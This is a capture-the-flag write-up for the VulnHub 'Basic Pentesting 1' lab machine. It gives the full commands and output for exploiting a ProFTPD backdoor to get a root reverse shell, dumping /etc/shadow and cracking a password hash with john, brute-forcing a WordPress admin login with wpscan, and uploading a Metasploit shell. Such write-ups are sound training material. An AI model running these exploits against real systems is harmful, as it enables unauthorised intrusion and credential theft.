This is my write up how to pwn this box, if you have another solution, please comment below.
You can download the box on this link
https://www.vulnhub.com/entry/basic-pentesting-1,216/
Information Gathering
First, I want to know virtualbox IP address that assigned to the box.
root@sempur:~# netdiscover -r 192.168.40.0/24 -i eth1
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.40.1 08:00:27:ce:cd:b1 1 60 PCS Systemtechnik GmbH
192.168.40.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.40.100 08:00:27:14:06:50 1 60 PCS Systemtechnik GmbH
* this result maybe difference, based on your virtualbox configuration
After that, I want to know what services are running on this box. In this case, I used Nmap to know version, port, OS, etc.
root@sempur:~# nmap -sV 192.168.40.100
Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-12 15:24 WIB
Nmap scan report for 192.168.40.100
Host is up (0.00020s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.32 seconds
You can see the result, there is FTP, SSH, HTTP services running on this box. I need to know, which services are vulnerable.
Exploring FTP service
Based on nmap result, this server using ProFTPD version 1.3.3c which is vulnerable to backdoor command execution. You can find by googling or using searchsploit for more information.
https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor
root@sempur:~# msfconsole
msf > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set rhost 192.168.40.100
rhost => 192.168.40.100
msf exploit(proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.40.101:4444
[*] 192.168.40.100:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qZBpq8Ol9KN6lYs4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "qZBpq8Ol9KN6lYs4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.40.101:4444 -> 192.168.40.100:39812) at 2018-02-21 13:59:27 +0700
whoami
root
By using this exploit, you got root access, so you can explore this box as root.
Accessing SSH
After I got root by exploiting ProFTPD, I try to find another way to get in the box. Based on nmap result, there is SSH service running on this box. So, I think I can use this way to login as another user. I can use /etc/passwd and /etc/shadow to get password using john.
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
/etc/shadow
root:!:17484:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:*:17379:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
mysql:!:17486:0:99999:7:::
sshd:*:17486:0:99999:7:::
root@sempur:~# unshadow passwd shadow > p.txt
root@sempur:~# john p.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2018-02-21 11:34) 11.11g/s 88.88p/s 88.88c/s 88.88C/s marlinspike..marlinspikes
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@sempur:~# john --show p.txt
marlinspike:marlinspike:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
1 password hash cracked, 0 left
As you can see, john got password for marlinspike user. So, I try to login via SSH by using marlinspike as username and password. Apparently, user marlinspike is sudoers member.
root@sempur:~# ssh marlinspike@192.168.40.100
marlinspike@192.168.40.100's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
19 packages can be updated.
19 updates are security updates.
Last login: Mon Feb 12 06:50:26 2018 from 192.168.40.101
marlinspike@vtcsec:~$ whoami
marlinspike
marlinspike@vtcsec:~$ sudo su
[sudo] password for marlinspike:
root@vtcsec:/home/marlinspike# whoami
root
root@vtcsec:/home/marlinspike#
Exploring HTTP Service
I try to bruteforce directory using dirb and I got that website made by wordpress on directory secret.
*You need add local DNS in file /etc/hosts
127.0.0.1 localhost
192.168.40.100 vtcsec
root@sempur:~# dirb http://192.168.40.100/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Feb 21 09:51:10 2018
URL_BASE: http://192.168.40.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.40.100/ ----
+ http://192.168.40.100/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.40.100/secret/
+ http://192.168.40.100/server-status (CODE:403|SIZE:302)
---- Entering directory: http://192.168.40.100/secret/ ----
+ http://192.168.40.100/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/
==> DIRECTORY: http://192.168.40.100/secret/wp-content/
==> DIRECTORY: http://192.168.40.100/secret/wp-includes/
+ http://192.168.40.100/secret/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.40.100/secret/wp-admin/ ----
+ http://192.168.40.100/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/css/
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/images/
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/includes/
+ http://192.168.40.100/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/js/
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/maint/
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/network/
==> DIRECTORY: http://192.168.40.100/secret/wp-admin/user/
---- Entering directory: http://192.168.40.100/secret/wp-content/ ----
+ http://192.168.40.100/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.40.100/secret/wp-content/plugins/
==> DIRECTORY: http://192.168.40.100/secret/wp-content/themes/
---- Entering directory: http://192.168.40.100/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.40.100/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.40.100/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.40.100/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.40.100/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.40.100/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.40.100/secret/wp-admin/network/ ----
+ http://192.168.40.100/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.40.100/secret/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.40.100/secret/wp-admin/user/ ----
+ http://192.168.40.100/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.40.100/secret/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.40.100/secret/wp-content/plugins/ ----
+ http://192.168.40.100/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.40.100/secret/wp-content/themes/ ----
+ http://192.168.40.100/secret/wp-content/themes/index.php (CODE:200|SIZE:0)
-----------------
END_TIME: Wed Feb 21 09:51:33 2018
DOWNLOADED: 36896 - FOUND: 13
Next, I use wpscan to find more information about this website.
root@sempur:~# wpscan --url http://vtcsec/secret/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://vtcsec/secret/
[+] Started: Thu Feb 22 16:09:38 2018
[!] The WordPress 'http://vtcsec/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: ; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://vtcsec/secret/xmlrpc.php
[!] Upload directory has directory listing enabled: http://vtcsec/secret/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://vtcsec/secret/wp-includes/
[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 6 vulnerabilities identified from the version number
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
Reference: https://wpvulndb.com/vulnerabilities/8966
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.9.1
[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
Reference: https://wpvulndb.com/vulnerabilities/8967
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.9.1
[!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
Reference: https://wpvulndb.com/vulnerabilities/8968
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
Reference: https://wpvulndb.com/vulnerabilities/8969
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/9006
Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/ticket/42720
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.9.2
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
Reference: https://wpvulndb.com/vulnerabilities/9021
Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
Reference: https://github.com/quitten/doser.py
Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
[+] WordPress theme in use: twentyseventeen - v1.4
[+] Name: twentyseventeen - v1.4
| Latest version: 1.4 (up to date)
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
| Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
| Theme Name: Twenty Seventeen
| Theme URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
+----+-------+-------------------+
| Id | Login | Name |
+----+-------+-------------------+
| 1 | admin | admin – My secret |
+----+-------+-------------------+
[!] Default first WordPress username 'admin' is still used
[+] Finished: Thu Feb 22 16:09:44 2018
[+] Requests Done: 103
[+] Memory used: 39.34 MB
[+] Elapsed time: 00:00:06
I got username, admin. So, I try to guess password 'admin', then I can log in to admin panel. Or, If you want using tool to bruteforce password, you can use wpscan to get password.
root@sempur:~# wpscan --url http://vtcsec/secret/ --username admin --wordlist /usr/share/wordlists/fasttrack.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://vtcsec/secret/
[+] Started: Thu Feb 22 16:35:23 2018
[!] The WordPress 'http://vtcsec/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: ; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://vtcsec/secret/xmlrpc.php
[!] Upload directory has directory listing enabled: http://vtcsec/secret/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://vtcsec/secret/wp-includes/
[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 6 vulnerabilities identified from the version number
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
Reference: https://wpvulndb.com/vulnerabilities/8966
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.9.1
[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
Reference: https://wpvulndb.com/vulnerabilities/8967
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.9.1
[!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
Reference: https://wpvulndb.com/vulnerabilities/8968
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
Reference: https://wpvulndb.com/vulnerabilities/8969
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/9006
Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/ticket/42720
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.9.2
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
Reference: https://wpvulndb.com/vulnerabilities/9021
Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
Reference: https://github.com/quitten/doser.py
Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
[+] WordPress theme in use: twentyseventeen - v1.4
[+] Name: twentyseventeen - v1.4
| Latest version: 1.4 (up to date)
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
| Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
| Theme Name: Twenty Seventeen
| Theme URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
[+] [SUCCESS] Login : admin Password : admin
Brute Forcing 'admin' Time: 00:00:02 <== > (130 / 223) 58.29% ETA: 00:00:02
+----+-------+------+----------+
| Id | Login | Name | Password |
+----+-------+------+----------+
| | admin | | admin |
+----+-------+------+----------+
[+] Finished: Thu Feb 22 16:35:30 2018
[+] Requests Done: 225
[+] Memory used: 37.777 MB
[+] Elapsed time: 00:00:06
Get The Shell
After i got username and password, i need to get shell from this way. I use metasploit to upload the backdoor, and access the shell from msfconsole.
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload
root@sempur:~# msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v4.16.15-dev ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set username admin
username => admin
msf exploit(wp_admin_shell_upload) > set password admin
password => admin
msf exploit(wp_admin_shell_upload) > set rhost vtcsec
rhost => vtcsec
msf exploit(wp_admin_shell_upload) > set targeturi /secret
targeturi => /secret
msf exploit(wp_admin_shell_upload) > show options
msf exploit(wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.40.101:4444
[*] Authenticating with WordPress using admin:admin...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /secret/wp-content/plugins/fVdnYcKEGU/nrdKKXzecZ.php...
[*] Sending stage (37543 bytes) to 192.168.40.100
[*] Meterpreter session 1 opened (192.168.40.101:4444 -> 192.168.40.100:45522) at 2018-02-22 15:15:44 +0700
[+] Deleted nrdKKXzecZ.php
[+] Deleted fVdnYcKEGU.php
meterpreter > sysinfo
Computer : vtcsec
OS : Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > shell
whoami
www-data
Finally, i got shell from metasploit, but the user still www-data, if you want get root permission, you need escalate the privilege. Exploiting the FTP server is the best way to get root access (in my opinion).